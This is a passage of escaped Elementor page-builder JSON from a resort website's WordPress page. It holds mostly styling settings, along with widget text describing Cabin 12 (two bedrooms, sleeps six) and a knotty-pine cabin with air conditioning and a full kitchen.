},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\